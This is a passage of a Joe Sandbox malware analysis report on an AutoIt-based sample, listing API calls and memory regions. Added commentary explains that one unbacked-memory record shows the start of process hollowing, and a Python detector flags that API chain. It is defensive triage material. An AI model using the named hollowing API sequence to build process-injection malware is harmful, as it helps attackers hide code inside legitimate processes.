• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID:
• String ID: #v
• API String ID: 0-554117064
• Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
• Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
• Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
• Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86

APIs
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID: #v
• API String ID: 2429186680-554117064
• Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
• Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
• Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
• Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040D2A63
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D2AF9
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D2B1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                • Instruction ID: b33d37d37480c53a3f5f63b838c2444d0cf7811c245399c3593a330ff3f17c5d
                                                                                                • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                • Instruction Fuzzy Hash: 9362FB30A142589BEB24CFA4C850BDEB376EF58300F1091A9D10DFB294E7769E85CB5A
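The record above is the one that matters for triage: a function living at 040D1000 in memory that is not backed by a PE image (Offset 040D1000, based on PE: false) calls CreateProcessW, then Wow64GetThreadContext, then ReadProcessMemory on the new process. That is the opening sequence of process hollowing (RunPE) and matches the "Modifies the context of a thread in another process" and "Writes to foreign memory regions" signatures in the overview. The following is an added example, not Joe Sandbox code: it parses resolved-call lines in the format this report uses and flags the hollowing prelude. The three sample lines are copied from the record above; the benign record is constructed as a control; the API names beyond the three on the page are the usual hollowing set and are an assumption of the example, not something the report lists.

```python
import re
from typing import Dict, List, Tuple

# Joe Sandbox renders each resolved call as "• Name.MODULE(args), ref: ADDR".
# HOLLOWING_RECORD is copied from the report record above (plus its source
# line); BENIGN_RECORD is a constructed control the matcher must reject.
HOLLOWING_RECORD = """
• CreateProcessW.KERNELBASE(?,00000000), ref: 040D2A63
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D2AF9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D2B1B
• Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
"""
BENIGN_RECORD = """
• GetOpenFileNameW.COMDLG32(?), ref: 0042961B
• GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

API_LINE = re.compile(
    r"•\s*(?P<api>[A-Za-z0-9_@]+)\.(?P<mod>[A-Za-z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
PE_BACKED = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)

def parse_api_calls(record: str) -> List[Dict[str, str]]:
    """Resolved API calls of one record, in listing order (CRT-only lines without
    parentheses, such as '_wcsncpy.LIBCMT ref: ...', are deliberately skipped)."""
    return [m.groupdict() for m in API_LINE.finditer(record)]

def region_is_unbacked(record: str) -> bool:
    """True when the dump source says the code is not backed by a PE image
    (i.e. it runs from unpacked / injected memory)."""
    m = PE_BACKED.search(record)
    return bool(m) and m.group(1).lower() == "false"

# Stages of the classic RunPE / process-hollowing prelude. The spawn call must
# precede the thread-context call; the third stage covers the calls that touch
# the child's memory or context. Names beyond the three on the page are the
# example's own assumption about the usual hollowing API set.
STAGES: Tuple[Tuple[str, set], ...] = (
    ("spawn",   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}),
    ("context", {"GetThreadContext", "Wow64GetThreadContext", "NtGetContextThread"}),
    ("memory",  {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
                 "NtUnmapViewOfSection", "VirtualAllocEx", "SetThreadContext",
                 "Wow64SetThreadContext", "ResumeThread", "NtResumeThread"}),
)

def hollowing_score(calls: List[Dict[str, str]]) -> Tuple[bool, List[str]]:
    """Walk the calls in order and note which stage each satisfies. The record is
    a hit only when a spawn call is followed later by a thread-context call and
    at least one cross-process memory/context call is present."""
    seen: List[str] = []
    spawn_idx = None
    context_after_spawn = False
    for i, call in enumerate(calls):
        for stage, apis in STAGES:
            if call["api"] in apis:
                seen.append(stage)
                if stage == "spawn" and spawn_idx is None:
                    spawn_idx = i
                if stage == "context" and spawn_idx is not None and i > spawn_idx:
                    context_after_spawn = True
    return context_after_spawn and "memory" in seen, seen

def triage_record(record: str) -> Dict[str, object]:
    """Combine both checks: the API chain and whether the code is image-backed."""
    hit, stages = hollowing_score(parse_api_calls(record))
    return {"hollowing": hit, "stages": stages, "unbacked": region_is_unbacked(record)}

if __name__ == "__main__":
    for name, rec in (("040D1000", HOLLOWING_RECORD), ("control", BENIGN_RECORD)):
        print(name, triage_record(rec))
```

The unbacked flag is what separates this record from the AutoIt runtime code at 00400000 elsewhere on the page: the same API names inside an image-backed module would be far less interesting than inside RWX memory that the sample itself unpacked.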
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: Error:
                                                                                                • API String ID: 4104443479-232661952
                                                                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                APIs
                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                • String ID: X$pWH
                                                                                                • API String ID: 85490731-941433119
                                                                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • _memmove.LIBCMT ref: 00401B57
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                • String ID: @EXITCODE
                                                                                                • API String ID: 2734553683-3436989551
                                                                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 1794320848-0
                                                                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                APIs
                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell_
                                                                                                • String ID:
                                                                                                • API String ID: 1144537725-0
                                                                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 680241177-0
                                                                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                APIs
                                                                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                • _free.LIBCMT ref: 004295A0
                                                                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 3938964917-2806939583
Strings
• >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: _strcat
• String ID: >>>AUTOIT NO CMDEXECUTE<<<
• API String ID: 1765576173-2684727018
APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• __wsplitpath.LIBCMT ref: 004678F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ErrorLast__wsplitpath_malloc
• String ID:
• API String ID: 4163294574-0
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
• String ID:
• API String ID: 3199840319-0
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
• __lock_file.LIBCMT ref: 00414A8D
  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
• __fclose_nolock.LIBCMT ref: 00414A98
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 040D2A63
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D2AF9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D2B1B
Memory Dump Source
• Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759

APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
• Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
• Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
• Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99

APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
